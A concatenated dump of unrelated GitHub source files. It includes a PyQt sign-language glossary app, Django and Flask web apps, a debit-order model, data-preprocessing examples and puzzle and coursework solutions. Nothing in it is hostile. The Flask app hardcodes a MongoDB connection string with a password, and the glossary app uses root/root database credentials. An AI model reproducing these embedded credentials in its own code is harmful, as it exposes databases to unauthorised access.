get_system():\r\n if(platform.architecture()[0] == '32bit'):\r\n source = r'C:\\Users\\assuncao\\Desktop\\glossario- windows\\api-ms-win-downlevel-shlwapi-l1-1-0.dll'\r\n destination = r'C:\\Windows\\System32'\r\n\r\n shutil.move(source, destination)\r\n \r\n def get_user_path(self):\r\n user_path = os.path.expanduser('~')\r\n self.final_path = os.path.join(user_path, 'LIBRAS')\r\n if(os.path.isdir(self.final_path)):\r\n print('dir já existe')\r\n os.chdir(self.final_path)\r\n else:\r\n os.mkdir(self.final_path)\r\n fantasy_zip = zipfile.ZipFile('disciplina.zip')\r\n #extrai toda a estrutura de arquivos para a nova pasta criada\r\n fantasy_zip.extractall(self.final_path)\r\n os.chdir(self.final_path)\r\n fantasy_zip.close() \r\n def escolha_disc(disc):\r\n path_disc = os.path.join(os.getcwd(), disc)\r\n os.chdir(path_disc)\r\n def mostrar_disc(self): \r\n for k, v in self.lista_disc.items():\r\n btnDisc = QtWidgets.QPushButton(v)\r\n #print(btn.text())\r\n btnDisc.setFixedHeight(51)\r\n btnDisc.setCheckable(True)\r\n btnDisc.setFixedWidth(107)\r\n # btn.setObjectName(k)\r\n btnDisc.isFlat()\r\n btnDisc.setStyleSheet(\"\"\"QPushButton{ border: thin; background : rgb(177, 178, 181); border-radius : 2px;\r\n\t-moz-border-radius : 6px;\r\n\t-webkit-border-radius : 6px ;} QPushButton:checked{background-color: rgb(163, 164, 168)}\"\"\")\r\n btnDisc.setFocusPolicy(QtCore.Qt.StrongFocus)\r\n \r\n self.vbox.addWidget(btnDisc)\r\n def get_disciplinas(self, disc):\r\n connection = pymysql.connect(host='localhost',\r\n user='root',\r\n password='root',\r\n port = 3306, \r\n db='librasdb',\r\n charset='latin1',\r\n cursorclass=pymysql.cursors.DictCursor)\r\n \r\n cursor = connection.cursor()\r\n\r\n cursor.execute(\"SELECT discdescricao, discdir FROM disciplina WHERE discdir = %s\", (disc))\r\n result = cursor.fetchall() #retorna a linh\r\n self.lista_disc = {}\r\n for row in result:\r\n self.lista_disc[row.get('discdir')] = row.get('discdescricao') \r\n \r\n connection.close() #fecha a conexão\r\n def validacao(self):\r\n if self.btnDisc.isChecked():\r\n self.scrollArea.show()\r\n else:\r\n self.scrollArea.hide()\r\n def check_disc(self):\r\n path_disc = os.path.join(self.final_path, 'disciplina')\r\n tam = len(path_disc)\r\n lista = [f.path for f in os.scandir(path_disc) if f.is_dir() ]\r\n for i in lista:\r\n if os.path.exists(i) and os.path.isdir(i):\r\n if not os.listdir(i):\r\n print(\"Directory is empty\")\r\n else: \r\n disc = i[tam+1:]\r\n self.get_disciplinas(disc)\r\n else:\r\n print(\"Given Directory don't exists\")\r\n def components_scroll(self):\r\n self.vbox = QtWidgets.QVBoxLayout()\r\n self.mostrar_disc()\r\n self.btnCadastrar = QtWidgets.QPushButton('Adicionar')\r\n pm = QtGui.QPixmap(r'btn-disciplina.png')\r\n icon = QIcon(pm)\r\n self.btnCadastrar.setFixedHeight(51)\r\n self.btnCadastrar.setCheckable(True)\r\n self.btnCadastrar.setFixedWidth(107)\r\n self.btnCadastrar.setStyleSheet(\"\"\"QPushButton{ border: thin; background : rgb(177, 178, 181); border-radius : 2px;\r\n\t-moz-border-radius : 6px;\r\n\t-webkit-border-radius : 6px ;} QPushButton:checked{background-color: rgb(163, 164, 168)}\"\"\")\r\n self.btnCadastrar.setIcon(icon)\r\n self.btnCadastrar.setIconSize(QtCore.QSize(40,40))\r\n self.vbox.addWidget(self.btnCadastrar)\r\n self.vbox.setSizeConstraint(QLayout.SetFixedSize)\r\n self.conteudo.setLayout(self.vbox)\r\n self.ui.scrollArea.setStyleSheet(\"border: none;\")\r\n def get_disc(self):\r\n self.lista_botoes = self.conteudo.findChildren(QtWidgets.QPushButton) \r\n self.t = tuple(self.lista_botoes)\r\n \r\n for k, v in self.lista_disc.items(): \r\n if v == self.t[0].text():\r\n d = k\r\n return d \r\n\r\n \r\n def init_components(self):\r\n pixmap = QtGui.QPixmap(r'barra-lateral-04.png')\r\n self.ui.barraLateral.setPixmap(pixmap)\r\n #botao help\r\n pmHelp = QtGui.QPixmap(r'botao-lateral-1-14.png')\r\n icon = QIcon(pmHelp)\r\n self.ui.pushButton.setIcon(icon)\r\n self.ui.pushButton.setIconSize(QtCore.QSize(64,64))\r\n self.ui.pushButton.setToolTip(\"Ajuda\")\r\n \r\n \r\n pm = QtGui.QPixmap(r'logo-tela-inicial-13.png')\r\n self.ui.label.setPixmap(pm)\r\n \r\n pm2 = QtGui.QPixmap(r'instrucao-inicial.png')\r\n self.ui.labelMsg.setPixmap(pm2)\r\n self.ui.labelMsg.setScaledContents(True)\r\n \r\n pmIniciar = QtGui.QPixmap(r'botao-iniciar-10.png')\r\n icon = QIcon(pmIniciar)\r\n self.ui.btnIniciar.setIcon(icon)\r\n self.ui.btnIniciar.setIconSize(QtCore.QSize(100,80))\r\n \r\n \r\n# pm1 = QtGui.QPixmap(r'C:\\Users\\laris\\Desktop\\dist_funfanod\\btn-1.png')\r\n# icon = QIcon(pm1)\r\n# self.ui.btn1.setIcon(icon)\r\n# self.ui.btn1.setIconSize(QtCore.QSize(67,67))\r\n# self.ui.btn1.setToolTip(\"Sobre\")\r\n \r\n pmDisc = QtGui.QPixmap(r'btn-disciplina.png')\r\n icon = QIcon(pmDisc)\r\n self.ui.btnDisc.setIcon(icon)\r\n self.ui.btnDisc.setIconSize(QtCore.QSize(64,64))\r\n self.ui.btnDisc.setToolTip(\"Disciplina\")\r\n \r\n def open_chm(self):\r\n path = os.path.dirname(os.path.realpath(__file__))\r\n os.chdir(path)\r\n webbrowser.open_new(os.path.join(r'manual.pdf'))\r\n \r\ndef open_disc(self):\r\n if __name__=='__main__':\r\n #app = QtCore.QCoreApplication.instance()\r\n app2=QtCore.QCoreApplication.instance()\r\n if app2 is None:\r\n app2 = QApplication(sys.argv)\r\n # app=QApplication(sys.argv)\r\n window2=cadastrar_disciplina.CadastrarDisciplina()\r\n window2.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n # window.setFixedSize(window.size())\r\n window2.show()\r\n #sys.exit(app2.exec_())\r\n#def open_sobre(self):\r\n## if __name__=='__main__':\r\n## #app = QtCore.QCoreApplication.instance()\r\n## app=QtCore.QCoreApplication.instance()\r\n## if app is None:\r\n## app = QApplication(sys.argv)\r\n# # app=QApplication(sys.argv)\r\n# window=tela_sobre.TelaSobre()\r\n# window.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n# window.setFixedSize(window.size())\r\n# window.show()\r\n # sys.exit(app.exec_())\r\n \r\ndef open(disc):\r\n # d = self.t[0].clicked.connect(lambda:self.get_disc())\r\n \r\n if __name__=='__main__':\r\n #app = QtCore.QCoreApplication.instance()\r\n app=QtCore.QCoreApplication.instance()\r\n if app is None:\r\n app = QApplication(sys.argv)\r\n # app=QApplication(sys.argv)\r\n# print(self.disc_escolhida)\r\n #disc = 'BD' \r\n window=glossario.GuiLibras(disc)\r\n window.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n \r\n window.show()\r\n # self.h ide()\r\n\r\n #sys.exit(app.exec_())\r\n \r\n\r\n \r\nif __name__=='__main__':\r\n #app = QtCore.QCoreApplication.instance()\r\n app=QtCore.QCoreApplication.instance()\r\n if app is None:\r\n app = QApplication(sys.argv)\r\n # app=QApplication(sys.argv)\r\n window=TelaInicial()\r\n window.setWindowTitle(\"IFAM - Glossário de LIBRAS\")\r\n window.setFixedSize(window.size())\r\n window.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"menezeslarissa/glossario_libras","sub_path":"Glossário de Libras - Linux (64 Bits)/Glossário de Libras/tela_inicial.py","file_name":"tela_inicial.py","file_ext":"py","file_size_in_byte":9300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10848893746","text":"\"\"\"kino URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.contrib import admin\nfrom django.urls import path\nfrom app import views;\nfrom django.contrib.auth.views import LoginView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('hello/',views.home),\n path('create/',views.createData),\n path('welcometemp/',views.welcome),\n path('projections/',views.projections,name='projections'),\n path('login/',LoginView.as_view(template_name='login.html'), name='login'),\n path('register/',views.register,name = 'register'),\n path('logout/',views.logoutView,name='logout'),\n path('projections/create/',views.createProjection,name='create'),\n path('projections/update/',views.updateProjection,name='update'),\n path('projections/delete/',views.deleteProjection,name='delete'),\n path('obrana/', views.obrana, name='obrana')\n \n]\n","repo_name":"martinictin/DjangoWeb","sub_path":"vjezba7/kino/kino/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70124477129","text":"from collections import deque\nfrom dataclasses import dataclass, field\nfrom pprint import pprint\nfrom typing import List\n\n\n@dataclass\nclass GraphNode:\n name: str\n neighbors: List['GraphNode'] = field(default_factory=lambda: [])\n\n @property\n def small(self):\n return self.name.islower()\n\n\ndef load_nodes():\n with open('input.txt', 'r') as f:\n lines: List[str] = f.readlines()\n nodes = {\n 'start': GraphNode('start'),\n 'end': GraphNode('end'),\n }\n for line in lines:\n from_, to = line.strip().split('-')\n if from_ not in nodes:\n nodes[from_] = GraphNode(from_)\n if to not in nodes:\n nodes[to] = GraphNode(to)\n nodes[from_].neighbors.append(nodes[to])\n nodes[to].neighbors.append(nodes[from_])\n return nodes\n\n\ndef part1():\n nodes = load_nodes()\n stack = deque([(nodes['start'], ['start'])])\n paths = []\n while len(stack) != 0:\n node, path = stack.pop()\n if node.name == 'end':\n paths.append(path)\n continue\n for neighbor in node.neighbors:\n if (neighbor.small and neighbor.name not in path) or not neighbor.small:\n stack.appendleft((neighbor, path + [neighbor.name]))\n print(len(paths))\n\n\ndef part2():\n nodes = load_nodes()\n stack = deque([(nodes['start'], ['start'], False)])\n paths = 0\n while len(stack) != 0:\n node, path, small = stack.pop()\n for neighbor in node.neighbors:\n if neighbor.name == 'end':\n paths += 1\n continue\n if (neighbor.small and neighbor.name not in path) or not neighbor.small:\n stack.appendleft((neighbor, path + [neighbor.name], small))\n elif neighbor.small and neighbor.name in path and not small and neighbor.name != 'start':\n stack.appendleft((neighbor, path + [neighbor.name], True))\n print(paths)\n\n\nif __name__ == '__main__':\n part1()\n part2()\n","repo_name":"AsiPanda/AventOfCode2021","sub_path":"day12/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5779750145","text":"from flask import Flask, render_template, redirect, url_for,request\nfrom flask_pymongo import PyMongo\nfrom bson.objectid import ObjectId\n\napp = Flask(__name__)\napp.config[\"MONGO_URI\"] = \"mongodb+srv://masterDB:qwerty123@cluster0.1efsd.mongodb.net/simpleTodoApp?retryWrites=false&w=majority\"\nmongo = PyMongo(app)\ntodos = mongo.db.todos\n\n@app.route(\"/\")\ndef index():\n saved_todos = todos.find()\n return render_template(\"index.html\", todos=saved_todos)\n\n@app.route(\"/add\", methods=[\"POST\"])\ndef add_todo():\n new_todo = request.form.get('new-todo')\n todos.insert_one({'task':new_todo, 'completed':False})\n return redirect(url_for('index'))\n\n@app.route(\"/complete/\")\ndef complete(oid):\n todo = todos.update_one({'_id': ObjectId(oid)}, {'$set':{'completed':True}})\n return redirect(url_for('index'))\n\n@app.route(\"/delete-completed\")\ndef deleteCompleted():\n deleted = todos.delete_many({'completed':True})\n return redirect(url_for('index'))\n\n@app.route(\"/delete-all\")\ndef deleteAll():\n deleted = todos.delete_many({})\n return redirect(url_for('index'))\n\n@app.route(\"/delete/\")\ndef deleteSelected(oid):\n deleted = todos.delete_one({'_id':ObjectId(oid)})\n return redirect(url_for('index'))","repo_name":"aesavas/simpleTodoApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70567603527","text":"# -*- coding: utf-8 -*-\n\"\"\"2.5 데이터_전처리.ipynb\n\n### 데이터 인코딩\n\n* 레이블 인코딩(Label encoding)\n\"\"\"\n\nfrom sklearn.preprocessing import LabelEncoder\n\nitems=['TV','냉장고','전자렌지','컴퓨터','선풍기','선풍기','믹서','믹서']\n\n# LabelEncoder를 객체로 생성한 후 , fit( ) 과 transform( ) 으로 label 인코딩 수행. \nencoder = LabelEncoder()\nencoder.fit(items)\nlabels = encoder.transform(items)\nprint('인코딩 변환값:',labels)\n\nprint('인코딩 클래스:',encoder.classes_)\n\nprint('디코딩 원본 값:',encoder.inverse_transform([4, 5, 2, 0, 1, 1, 3, 3]))\n\n\"\"\"* 원-핫 인코딩(One-Hot encoding)\"\"\"\n\nfrom sklearn.preprocessing import OneHotEncoder\nimport numpy as np\n\nitems=['TV','냉장고','전자렌지','컴퓨터','선풍기','선풍기','믹서','믹서']\n\n# 2차원 ndarray로 변환합니다. \nitems = np.array(items).reshape(-1, 1)\n\n# 원-핫 인코딩을 적용합니다. \noh_encoder = OneHotEncoder()\noh_encoder.fit(items)\noh_labels = oh_encoder.transform(items)\n\n# OneHotEncoder로 변환한 결과는 희소행렬(Sparse Matrix)이므로 toarray()를 이용하여 밀집 행렬(Dense Matrix)로 변환. \nprint('원-핫 인코딩 데이터')\nprint(oh_labels.toarray())\nprint('원-핫 인코딩 데이터 차원')\nprint(oh_labels.shape)\n\nimport pandas as pd\n\n# 원-핫 인코딩 더 쉽게 하는 방법 : get_dummies\ndf = pd.DataFrame({'item':['TV','냉장고','전자렌지','컴퓨터','선풍기','선풍기','믹서','믹서'] })\npd.get_dummies(df)\n\n\"\"\"### 피처 스케일링과 정규화\n\n* StandardScaler\n\"\"\"\n\nfrom sklearn.datasets import load_iris\nimport pandas as pd\n# 붓꽃 데이터 셋을 로딩하고 DataFrame으로 변환합니다. \niris = load_iris()\niris_data = iris.data\niris_df = pd.DataFrame(data=iris_data, columns=iris.feature_names)\n\nprint('feature 들의 평균 값')\nprint(iris_df.mean())\nprint('\\nfeature 들의 분산 값')\nprint(iris_df.var())\n\nfrom sklearn.preprocessing import StandardScaler\n\n# StandardScaler객체 생성\nscaler = StandardScaler()\n# StandardScaler 로 데이터 셋 변환. fit( ) 과 transform( ) 호출. \nscaler.fit(iris_df)\niris_scaled = scaler.transform(iris_df)\n\n#transform( )시 scale 변환된 데이터 셋이 numpy ndarry로 반환되어 이를 DataFrame으로 변환\niris_df_scaled = pd.DataFrame(data=iris_scaled, columns=iris.feature_names)\nprint('feature 들의 평균 값')\nprint(iris_df_scaled.mean())\nprint('\\nfeature 들의 분산 값')\nprint(iris_df_scaled.var())\n\n\"\"\"* MinMaxScaler\"\"\"\n\nfrom sklearn.preprocessing import MinMaxScaler\n\n# MinMaxScaler객체 생성\nscaler = MinMaxScaler()\n# MinMaxScaler 로 데이터 셋 변환. fit() 과 transform() 호출. \nscaler.fit(iris_df)\niris_scaled = scaler.transform(iris_df)\n\n# transform()시 scale 변환된 데이터 셋이 numpy ndarry로 반환되어 이를 DataFrame으로 변환\niris_df_scaled = pd.DataFrame(data=iris_scaled, columns=iris.feature_names)\nprint('feature들의 최소 값')\nprint(iris_df_scaled.min())\nprint('\\nfeature들의 최대 값')\nprint(iris_df_scaled.max())\n\n\"\"\"* Scaler를 이용하여 학습 데이터와 테스트 데이터에 fit(), transform(), fit_transform() 적용 시 유의사항. \"\"\"\n\nfrom sklearn.preprocessing import MinMaxScaler\nimport numpy as np\n\n# 학습 데이터는 0 부터 10까지, 테스트 데이터는 0 부터 5까지 값을 가지는 데이터 세트로 생성\n# Scaler클래스의 fit(), transform()은 2차원 이상 데이터만 가능하므로 reshape(-1, 1)로 차원 변경\ntrain_array = np.arange(0, 11).reshape(-1, 1)\ntest_array = np.arange(0, 6).reshape(-1, 1)\n\n# 최소값 0, 최대값 1로 변환하는 MinMaxScaler객체 생성\nscaler = MinMaxScaler()\n# fit()하게 되면 train_array 데이터의 최소값이 0, 최대값이 10으로 설정. \nscaler.fit(train_array)\n# 1/10 scale로 train_array 데이터 변환함. 원본 10-> 1로 변환됨.\ntrain_scaled = scaler.transform(train_array)\n \nprint('원본 train_array 데이터:', np.round(train_array.reshape(-1), 2))\nprint('Scale된 train_array 데이터:', np.round(train_scaled.reshape(-1), 2))\n\n# 앞에서 생성한 MinMaxScaler에 test_array를 fit()하게 되면 원본 데이터의 최소값이 0, 최대값이 5으로 설정됨 \nscaler.fit(test_array)\n# 1/5 scale로 test_array 데이터 변환함. 원본 5->1로 변환. \ntest_scaled = scaler.transform(test_array)\n# train_array 변환 출력\nprint('원본 test_array 데이터:', np.round(test_array.reshape(-1), 2))\nprint('Scale된 test_array 데이터:', np.round(test_scaled.reshape(-1), 2))\n\nscaler = MinMaxScaler()\nscaler.fit(train_array)\ntrain_scaled = scaler.transform(train_array)\nprint('원본 train_array 데이터:', np.round(train_array.reshape(-1), 2))\nprint('Scale된 train_array 데이터:', np.round(train_scaled.reshape(-1), 2))\n\n# test_array에 Scale 변환을 할 때는 반드시 fit()을 호출하지 않고 transform() 만으로 변환해야 함. \ntest_scaled = scaler.transform(test_array)\nprint('\\n원본 test_array 데이터:', np.round(test_array.reshape(-1), 2))\nprint('Scale된 test_array 데이터:', np.round(test_scaled.reshape(-1), 2))\n","repo_name":"yerinsally/machine_learning_perfect_guide","sub_path":"py/02_5_data_preprocessing.py","file_name":"02_5_data_preprocessing.py","file_ext":"py","file_size_in_byte":5139,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40833339206","text":"import reversion\n\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.utils import timezone\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom maguire.models import AppModel\n\nfrom events.models import Event\n\n\n@reversion.register()\nclass Debit(AppModel):\n \"\"\"\n Debit Model\n \"\"\"\n STATUS_CHOICES = (\n (\"pending\", \"Pending\"),\n (\"processing\", \"Processing\"),\n (\"loaded\", \"Loaded\"),\n (\"successful\", \"Successful\"),\n (\"failed\", \"Failed\"),\n )\n ACCOUNT_TYPE_CHOICES = (\n (\"savings\", \"Savings\"),\n (\"current\", \"Current\"),\n )\n # Optional Identifing information\n client = models.CharField(\n max_length=50,\n verbose_name=_(\"Client\"),\n help_text=_(\"Client identifier (UUID, number, reference, etc.) from your system\"),\n null=True, blank=True\n )\n downstream_reference = models.CharField(\n max_length=50,\n verbose_name=_(\"Reference\"),\n unique=True,\n help_text=_(\"Payment reference (UUID, number, reference, etc.) from your system. \"\n \"This must either be None or should be unique to prevent duplication\"),\n null=True, blank=True\n )\n callback_url = models.CharField(\n max_length=500,\n verbose_name=_(\"Callback URL\"),\n help_text=_(\"URL to callback when debit moves to successful or failed\"),\n null=True, blank=True\n )\n # Banking details\n account_name = models.CharField(\n max_length=60,\n verbose_name=_(\"Account Name\"),\n help_text=_(\"Bank account holder's name, unvalidated\")\n )\n account_number = models.CharField(\n max_length=15,\n help_text=_(\"Bank account Number\"))\n branch_code = models.CharField(max_length=6)\n account_type = models.CharField(\n choices=ACCOUNT_TYPE_CHOICES, max_length=30,\n null=True, blank=True)\n # Debit details\n status = models.CharField(\n choices=STATUS_CHOICES, max_length=30,\n default=\"pending\")\n amount = models.DecimalField(\n max_digits=10, decimal_places=2)\n reference = models.CharField(\n null=True, blank=True,\n max_length=9,\n verbose_name=_(\"Debit Reference\"),\n help_text=_(\"Unique 9 digit validated debit reference, provider agnostic\"))\n provider = models.CharField(\n max_length=50,\n verbose_name=_(\"Provider\"),\n help_text=_(\"Upstream Debit provider, set by provider module\"),\n null=True, blank=True\n )\n provider_reference = models.CharField(\n max_length=200,\n verbose_name=_(\"Provider Reference\"),\n help_text=_(\"Upstream Debit provider reference for lookups\"),\n null=True, blank=True\n )\n provider_status = models.CharField(\n max_length=200,\n verbose_name=_(\"Provider Status\"),\n help_text=_(\"Upstream Debit provider status for error/success checks\"),\n null=True, blank=True\n )\n scheduled_at = models.DateTimeField(\n verbose_name=_(\"Scheduled at\"),\n help_text=_(\"Date and time after which pending debits will be loaded\"),\n null=True, blank=True)\n loaded_at = models.DateTimeField(\n verbose_name=_(\"Loaded at\"),\n help_text=_(\"Date and time that debit was loaded to provider\"),\n null=True, blank=True)\n load_attempts = models.IntegerField(\n default=0,\n verbose_name=_(\"Load Attempts\"),\n help_text=_(\"Number of times maguire has attmepted to load the debit\"))\n last_error = models.TextField(\n verbose_name=_(\"Last Error\"),\n help_text=_(\"The error message received on the last attempt to load the debit\"),\n null=True, blank=True)\n created_by = models.ForeignKey(\n User, related_name='debits_created', null=True, blank=True,\n on_delete=models.CASCADE)\n updated_by = models.ForeignKey(\n User, related_name='debits_updated', null=True, blank=True,\n on_delete=models.CASCADE)\n\n @property\n def node_id(self):\n from maguire.utils import b64_from_uuid\n return b64_from_uuid(self.id, \"DebitNode\").decode(\"utf-8\")\n\n def as_json(self):\n \"\"\"\n Prepares this Debit for JSON serialization\n \"\"\"\n return {\n 'id': str(self.id),\n 'client': self.client,\n 'downstream_reference': self.downstream_reference,\n 'callback_url': self.callback_url,\n 'account_name': self.account_name,\n 'account_number': self.account_number,\n 'branch_code': self.branch_code,\n 'account_type': self.account_type,\n 'status': self.status,\n 'amount': str(self.amount),\n 'reference': self.reference,\n 'provider': self.provider,\n 'provider_reference': self.provider_reference,\n 'provider_status': self.provider_status,\n 'scheduled_at': self.scheduled_at.isoformat() if self.loaded_at else None,\n 'loaded_at': self.loaded_at.isoformat() if self.loaded_at else None,\n 'load_attempts': self.load_attempts,\n 'last_error': self.last_error,\n 'created_at': self.created_at.isoformat(),\n 'created_by': self.created_by.id if self.created_by else None,\n 'updated_at': self.updated_at.isoformat(),\n 'updated_by': self.updated_by.id if self.updated_by else None,\n }\n\n def save(self, *args, **kwargs):\n if self.reference is None:\n self.reference = generate_unique_debit_reference(length=9)\n super(Debit, self).save(*args, **kwargs)\n\n def __str__(self):\n return str(self.id)\n\n\n@receiver(post_save, sender=Debit)\ndef create_event_debit(sender, instance, created, **kwargs):\n \"\"\" Post save hook that creates a model.created Event\n \"\"\"\n if created:\n source_model = ContentType.objects.get(app_label='debits', model='debit')\n Event.objects.create(**{\n \"source_model\": source_model,\n \"source_id\": instance.id,\n \"event_at\": timezone.now(),\n \"event_type\": \"model.created\",\n \"event_data\": instance.as_json(),\n \"created_by\": instance.created_by\n })\n\n\ndef generate_unique_debit_reference(length=9, attempts=0):\n from maguire.utils import random_digits, calculate_luhn\n\n source = random_digits(length-1)\n checksum = calculate_luhn(source)\n unique_reference = str(source) + str(checksum)\n\n try:\n Debit.objects.get(reference=unique_reference)\n if attempts < 10:\n generate_unique_debit_reference(length=length, attempts=attempts+1)\n else:\n return \"Aborting unique_reference generation after 10 failed attempts\"\n except Debit.DoesNotExist:\n return unique_reference\n","repo_name":"picsadotcom/maguire","sub_path":"backend/debits/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6945,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"6705720774","text":"# advent of code 2015 day 25\n\ndef main():\n assert 1 == get_cell_ordinal(1, 1)\n assert 12 == get_cell_ordinal(4, 2)\n assert 15 == get_cell_ordinal(1, 5)\n assert 31916031 == get_next(20151125)\n\n current = 20151125\n ordinal = get_cell_ordinal(2981, 3075)\n # one less, because we already have the number at field 1\n print(f\"Generating value for field {ordinal}\")\n for i in range(ordinal - 1):\n current = get_next(current)\n print(current)\n\n\ndef get_cell_ordinal(rows: int, columns: int) -> int:\n diagonal_before = rows + columns - 2\n count_up_to_current_diagonal = diagonal_before * (diagonal_before + 1) // 2\n return count_up_to_current_diagonal + columns\n\n\ndef get_next(current: int) -> int:\n return current * 252533 % 33554393\n\n\nif __name__ == \"__main__\":\n main()\n\n\n","repo_name":"nresare/aoc","sub_path":"aoc2015/day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21607137175","text":"\r\n#puts the pivot value to the start of arr so that 2 array has same pivot value\r\ndef putAtTheStart(arr,pivotValue,low,high): \r\n for i in range(low,high):\r\n if(arr[i] == pivotValue):\r\n arr[i],arr[low] = arr[low],arr[i]\r\n break\r\n\r\n\r\ndef partition (arr, low,high,pivotValueFromOtherArray):\r\n left = low\r\n right = high-1\r\n while(left < right):\r\n while(left < high and arr[left] <= pivotValueFromOtherArray ):\r\n left = left + 1\r\n while(right>low and arr[right] >pivotValueFromOtherArray):\r\n right = right - 1\r\n if(left < right) :\r\n arr[left],arr[right] = arr[right],arr[left]\r\n arr[low] = arr[right]\r\n arr[right] = pivotValueFromOtherArray\r\n return right\r\n\r\n\r\ndef matchGiftBox(boxes,gifts,low,high):\r\n if(low>=high or low < 0 or high > len(boxes)):\r\n return\r\n putAtTheStart(gifts,boxes[low],low,high) \r\n index = partition (gifts, low,high,boxes[low])\r\n partition(boxes, low,high,gifts[index]) \r\n matchGiftBox(boxes,gifts,low,index)\r\n matchGiftBox(boxes,gifts,index+1,high)\r\n\r\n#test\r\n\r\ngifts = [2,1,4,5,3]\r\nboxes = [3,1,5,2,4]\r\nprint(\"Before matching boxes with gifts\")\r\n\r\nprint(\"boxes:\")\r\nprint(boxes)\r\n\r\nprint(\"gifts:\")\r\nprint(gifts)\r\n\r\nmatchGiftBox(boxes,gifts,0,len(boxes))\r\nprint(\"After matching boxes with gifts\")\r\n\r\nprint(\"boxes:\")\r\nprint(boxes)\r\n\r\nprint(\"gifts:\")\r\nprint(gifts)\r\n\r\n","repo_name":"MustafaKarakasTr/CSE-321-Introduction-to-Algorithms-Course-Homeworks","sub_path":"HW2/CSE321_HW2_1801042627/matchGiftBox_1801042627.py","file_name":"matchGiftBox_1801042627.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22178689541","text":"import sys\n\nsys.path.append('/Users/chengkai/Desktop/coding/Homework/KTH/Machine_Learning/dectrees/python')\n\nimport dtree\nimport monkdata as m\nimport drawtree_qt5 as draw\nimport random\n\n# \"assignment 1\"\nprint('Entropy:')\nprint(dtree.entropy(m.monk1))\nprint(dtree.entropy(m.monk2))\nprint(dtree.entropy(m.monk3))\nprint('\\n')\n\n# \"assignment 3\"\nprint('Information Gain:')\nprint('monk1:')\nfor i in range(6):\n print('attribute', i + 1, ':', dtree.averageGain(m.monk1, m.attributes[i]))\nprint('monk2:')\nfor i in range(6):\n print('attribute', i + 1, ':', dtree.averageGain(m.monk2, m.attributes[i]))\nprint('monk3:')\nfor i in range(6):\n print('attribute', i + 1, ':', dtree.averageGain(m.monk3, m.attributes[i]))\nprint('\\n')\n\n# assignment 5\nt1 = dtree.buildTree(m.monk1, m.attributes)\nprint(dtree.check(t1, m.monk1test))\n#draw.drawTree(t1)\nt2 = dtree.buildTree(m.monk2, m.attributes)\nprint(dtree.check(t2, m.monk2test))\nt3 = dtree.buildTree(m.monk3, m.attributes)\nprint(dtree.check(t3, m.monk3test))\nprint('\\n')\n\n\n# assignment 7\ndef partition(data, fraction):\n ldata = list(data)\n random.shuffle(ldata)\n breakPoint = int(len(ldata) * fraction)\n return ldata[:breakPoint], ldata[breakPoint:]\n\n\nfraction = [0.3, 0.4, 0.5, 0.6, 0.7, 0.8]\nfor i in fraction:\n sumScore = 0\n minScore = 1\n maxScore = 0\n for j in range(100):\n score = 0\n bestScore = 0\n\n monk1train, monk1val = partition(m.monk1, i)\n t = dtree.buildTree(monk1train, m.attributes)\n bestTree = t\n bestScore = dtree.check(t, monk1val)\n while True:\n dt = dtree.allPruned(bestTree)\n lastBestScore = bestScore\n for ts in dt:\n score = dtree.check(ts, monk1val)\n if score > bestScore:\n bestScore = score\n bestTree = ts\n if bestScore == lastBestScore:\n break\n bestScore = dtree.check(bestTree, m.monk1test)\n sumScore += bestScore\n minScore = min(minScore, bestScore)\n maxScore = max(maxScore, bestScore)\n\n meanScore = sumScore / 100\n print('fraction:', i, ' score:', meanScore, 'minScore:', minScore, 'maxScore:',maxScore)\n\nprint('\\n')\n\nfraction = [0.3, 0.4, 0.5, 0.6, 0.7, 0.8]\nfor i in fraction:\n sumScore = 0\n minScore = 1\n maxScore = 0\n for j in range(100):\n score = 0\n bestScore = 0\n\n monk3train, monk3val = partition(m.monk3, i)\n t = dtree.buildTree(monk3train, m.attributes)\n bestTree = t\n bestScore = dtree.check(t, monk3val)\n while True:\n dt = dtree.allPruned(bestTree)\n lastBestScore = bestScore\n for ts in dt:\n score = dtree.check(ts, monk3val)\n if score > bestScore:\n bestScore = score\n bestTree = ts\n if bestScore == lastBestScore:\n break\n bestScore = dtree.check(bestTree, m.monk3test)\n sumScore += bestScore\n minScore = min(minScore, bestScore)\n maxScore = max(maxScore, bestScore)\n\n meanScore = sumScore / 100\n print('fraction:', i, ' score:', meanScore, 'minScore:', minScore, 